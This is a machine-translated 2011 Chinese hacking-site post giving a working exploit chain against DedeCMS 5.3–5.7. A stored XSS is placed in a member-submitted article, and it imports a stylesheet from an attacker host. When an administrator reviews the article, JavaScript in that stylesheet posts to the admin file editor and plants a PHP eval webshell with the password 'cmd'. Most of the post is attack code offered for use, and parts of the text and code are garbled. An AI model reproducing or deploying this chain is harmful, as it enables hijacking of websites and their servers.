DeDecms xss pass to kill 0day attached getshell EXP-vulnerability warning-the black bar safety net

2011-06-25T00:00:00
ID MYHACK58:62201131026
Type myhack58
Reporter 佚名
Modified 2011-06-25T00:00:00

Description

Author: haris

Vulnerability cause: due to Editor filter is not strict, will cause the malicious script to run

Currently only tested on 5. 3 to 5. 7 version. Other earlier everyone is free to play.

Here to talk about the use of the method.

Condition 3: The

  1. Open registration

  2. Open submission

  3. Admin is very hardworking, will go to the review articles, most tasteless place.

Registered member-published articles

Content fill:

<style>@im\port’\http://xxx.com/xss.css’;</style>

NewXSS. CXX

body{

background-image:url('javascript:document. write("")')

}

Newxss. js

Content

var request = false;

if(window. XMLHttpRequest) {

request = new XMLHttpRequest();

if(request. overrideMimeType) {

request. overrideMimeType('text/xml');

}

} else if(window. ActiveXObject) {

var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];

for(var i=0; i try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

xmlhttp=request;

function getFolder( url ){

obj = url. split('/')

return obj[obj. length-2]

}

oUrl = top. location. href;

u = getFolder(oUrl);

add_admin();

function add_admin(){

var url= "/"+u+"/sys_sql_query.php";

var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris. php&str=%3C%3Fphp+eval%2 8%24_POST%5Bcmd%5D%2 9%3F%3E&B1=++%E4%BF%9D+%E5%AD%9 8++";

xmlhttp. open("POST", url, true);

xmlhttp. setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlhttp. setRequestHeader("Content-length", params. length);

xmlhttp. setRequestHeader("Connection", "Keep-Alive");

xmlhttp. send(params);

}

When an administrator review this article, 将自动在data目录生成一句话haris.php the. Password cmd